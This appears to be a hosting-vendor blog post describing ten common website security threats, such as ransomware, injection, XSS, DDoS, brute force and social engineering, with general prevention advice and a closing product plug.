Any website or online application – whether it’s an Internet bank processing millions of dollars in transactions daily or a storefront for small neighborhood businesses – can fall victim to malicious attacks and Internet security issues. Hackers often choose their targets by vulnerability, not by size or notoriety. Smaller systems, which may not even contain sensitive data, can be more tempting targets simply because they are easier to hack.
One might view website security as a single protective shell around a site and server, which can be strengthened or weakened. A more accurate perspective is that every cyber security measure is a layer of protection. Each layer you add keeps your data safer. Many layers will be redundant, and this is good. It may seem counterintuitive or paranoid, but the best approach when securing your site is to assume each layer will fail. For example, two-factor authentication adds a second layer of authentication under the assumption that the primary password will one day be stolen.
But what exactly is a security issue?
What is a Security Issue?
A security issue is any unmitigated risk or vulnerability in your system that hackers can use to do damage to systems or data. This includes vulnerabilities in the servers and software connecting your business to customers, as well as your business processes and people. A vulnerability that hasn’t been exploited is simply a vulnerability that hasn’t been exploited yet. Web security problems should be addressed as soon as they are discovered, and effort should be put into finding them because exploit attempts are inevitable.
Here are the 15 most common types of Internet security issues or web security problems and some relevant steps you can take to protect yourself, your data, and your business.
1. Ransomware Attack
The goal of a ransomware attack is to gain exclusive control of critical data. The hacker encrypts and holds your data hostage and then demands a ransom payment in exchange for the decryption key you need to access the files. The attacker may even download and threaten to release sensitive data publicly if you do not pay by a deadline. Ransomware is the type of attack you’re most likely to see reported in major news media.
How to Prevent: The most effective ransomware attack protection is to have a thorough, frequent backup of critical data in a safe location. The attacker loses leverage with a solid backup and recovery plan, allowing you to erase and restore the affected data.
2. Code Injection (Remote Code Execution)
To attempt a code injection, an attacker will search for places your application accepts user input – such as a contact form, data-entry field, or search box. Then, through experimentation, the hacker learns what various requests and field content will do.
For example, if your site’s search function places terms into a database query, they will attempt to inject other database commands into search terms. Alternatively, if your code pulls functions from other locations or files, they will attempt to manipulate those locations and inject malicious functions.
How to Prevent: Besides server or network-level protections like Cloudflare and Liquid Web’s Server Secure Plus, it is also important to address this security issue from a development perspective.
Keep any framework, CMS, or development platform regularly updated with security patches. When programming, follow best practices regarding input sanitization. No matter how insignificant, all user input should be checked against a basic set of rules for what input is expected.
For example, if the expected input is a five-digit number, add code to remove any input which is not a five-digit number. To help prevent SQL injections, many scripting languages include built-in functions to sanitize input for safe SQL execution. Use these functions on any variables that build database queries.
3. Cross-Site Scripting (XSS) Attack
JavaScript and other browser-side scripting methods are commonly used to dynamically update page content with external information such as a social media feed, current market information, or revenue-generating advertisements.
Hackers use XSS to attack your customers by using your site as a vehicle to distribute malware or unsolicited advertisements. As a result, your company’s reputation can be tarnished, and you can lose customer trust.
How to Prevent: Adjust content security policies on your site to limit source URLs of remote scripts and images to only your domain and whatever external URLs you specifically require. This small and often-overlooked step can prevent many XSS attacks from even getting off the ground.
Most XSS attacks rely on the site developer having done nothing to prevent it. If you’re a developer, you can mitigate these web security problems with input sanitization by properly escaping HTML tag characters, such as converting < and > to < and > on any user input processed by JavaScript. Small preventative measures can provide a lot of safety.
4. Malware and Virus Infection
Malware is short for malicious software. Malware on a workstation can encrypt data for ransomware purposes or even log keystrokes to capture passwords. Hackers typically use malware to expand existing access to your site or spread access to others on the same network.
If malware is present, you’ve already been breached. Therefore, it’s crucial to determine which Internet security issues led to the breach before any malware cleanup or restoration.
How to Prevent: On workstations, mitigate the risk of this security problem by being careful about what you download and using antivirus software to find and safely remove any malware. Keeping these antivirus applications regularly updated is critical, as the malware is constantly updated and improved. In addition, workstation logins should be users without administrative access. In a worst-case scenario, keep good backups to restore the workstation if it is compromised too deeply to clean.
5. DDoS Attack
Distributed Denial of Service (DDoS) attacks are generally not attempting to gain access. However, they are sometimes used in conjunction with brute force attacks (explained below) and other attack types as a way to make log data less useful during your investigation.
For example, the hacker may directly attack your application layer by overwhelming your site with more requests than it can handle. They may not even view an entire page – just a single image or script URL with a flood of concurrent requests. Beyond the traffic, flood making your site unreachable (which any volumetric attack will do), a Layer 7 attack can inflict further damage by flooding order queues or polling data with bogus transactions that require extensive and costly manual verification to sort out.
How to Prevent: Blocking such an attack can be nearly impossible by conventional means. There is generally no security issue being exploited. The requests themselves are not malicious and deliberately blend in with normal traffic. The more widely distributed the attack, the more difficult it is to distinguish legitimate requests from those that are not.
If you’re not able to use a DDoS protection service, options are fairly limited and vary case by case. The most effective measures absorb all the traffic by increasing available server and network resources to accommodate the additional traffic until the attack subsides or can be isolated.
6. Brute Force Attack
In a brute force attack, the hacker (usually with the help of automation) tries multiple password guesses in various combinations until one is successful. In simpler terms, think of it as opening a combination padlock by trying every possible combination of numbers in order.
How to Prevent: Many CMS and mainstream applications include software that monitors your system for repeated login failures or offers a plugin system that provides this information. These software and plugins are the best preventions for brute force attacks, as they severely limit the number of guesses allowed.
7. Weak Passwords and Authentication Issues
A chain is only as strong as its weakest link, and a computer system is only as secure as its weakest password. Therefore, for any level of access, all passwords should be of sufficient length and complexity. A strong password should include 18 characters minimum, and the longer, the better. Password length increases security more than complexity.
A password like “dK3(7PL” can be cracked faster than a password like “ThisPasswordIsSixWordsLong” even though the latter contains dictionary words.
How to Prevent: Use two-factor authentication wherever available. This can protect a login even if the correct password is obtained or guessed. Also, change your passwords on a regular schedule, such as every 60 or 90 days, and never use the same one twice.
8. Social Engineering
Social engineering encompasses all of the non-technical ways an attacker may use to gain access or do damage to your systems or data. The most common method is the oldest: lying or using fabricated information to gain trust.
A malicious actor may impersonate your bank, a utility provider, or even law enforcement. They may claim to be a customer or pose as an executive from your organization. The goal of such attacks is generally to either obtain sensitive information or trick an insider into unknowingly performing destructive actions.
They may try to:
- Obtain confidential contact details.
- Obtain account or credit card numbers.
- Obtain or reset passwords.
- Persuade staff to suspend or cancel essential services.
- Persuade staff to disable critical infrastructure.
- Persuade staff to upload or install malicious software.
Social engineering attacks can be devastatingly effective because the people who launch them are well-practiced in persuasion and deceit. Many have years of experience and finely-honed characters. For example, an attacker posing as law enforcement may give such a skilled performance that they’d fool an actual law enforcement officer. You absolutely cannot rely on your ability to judge character to protect yourself from these attacks.
How to Prevent: Watch for some of these common red-flag cues to become aware of social engineering at play:
- Aggressive language and demanding behavior are designed to make you feel like you’ve done something wrong.
- A sense of urgency around fixing a problem before you have time to fact-check.
- Threats of legal action or financial penalty if you do not immediately comply.
- Evasion and escalated emotion when you ask identity-verification questions.
If someone claims to be from your bank, you should be able to reach that person by calling your bank’s publicly listed phone number and being routed by an operator. Likewise, if an email appears to be an invoice from a service provider, that provider will typically have an online portal or publicly listed customer service phone number you can call to confirm any outstanding bills.
9. Insider Threat
Betrayal from the inside can harm your company on multiple levels. A trusted employee or contractor can damage your systems, steal confidential information, and even sabotage team unity. The attacker doesn’t even need to be an employee. They could be anyone you trust, like a customer or a delivery driver. Much as with social engineering, you simply cannot rely on your ability to judge character to keep yourself safe.
How to Prevent: Beyond initial vetting and background confirmation of any new employee or contractor, you can further protect yourself by limiting users’ access within the organization. Only grant access to systems required for assigned tasks and only the minimum level of access necessary to complete said tasks.
Accountability is also critical. A malicious insider, like any hacker, prefers to be undetected. Do not use single shared logins for any systems. Do not give a contractor or employee your CMS login. Instead, create a specific login only for them with appropriate permissions. Disable this login when it isn’t needed anymore.
Staff should also stay current on security best practices. Lock workstations in your office or shop with a strong password any time they’re unattended. Also, disable automatic mounting of external disk drives.
10. No Backups
As we covered earlier, we add layers of security, assuming that previous layers will someday fail. Therefore, it’s important to have a recovery plan in place in the event of a total loss, whether from catastrophic system failure or malicious exploit of one of the web security problems discussed here. The best recovery plans always begin with thorough, regular backups and adequate backup retention policies.
How to Prevent: Specifics will vary by your needs but revolve around three backup best practices: The scope of your backups, the scheduling of your backups, and your backup retention policy.
- Scope: Make sure the backup scope covers all specific items you’d need to restore site functionality or business operations. It could be as little as a directory of files and a database or two or entire disks. Include any non-default server configurations or custom application installations. If you can’t afford to lose it or can’t recreate it quickly from a default installation, include it in your backups.
- Scheduling: This can be one of the hardest decisions to make. An appropriate backup schedule will save backups often enough to catch updates and ensure any restored site will be reasonably current – but not so often as to negatively impact site performance or cause sequential backups to be essentially identical.
- Retention: A common mistake here is simply keeping one backup from the previous night to allow restoration after a server failure. But what happens if a site compromise is small and goes unnoticed for a day or more? Then the only available backups are compromised as well. The farther back you can rewind the clock, the better your options are.
Keep Your Servers Secure with LicenseMan
CATEGORY:Configuration
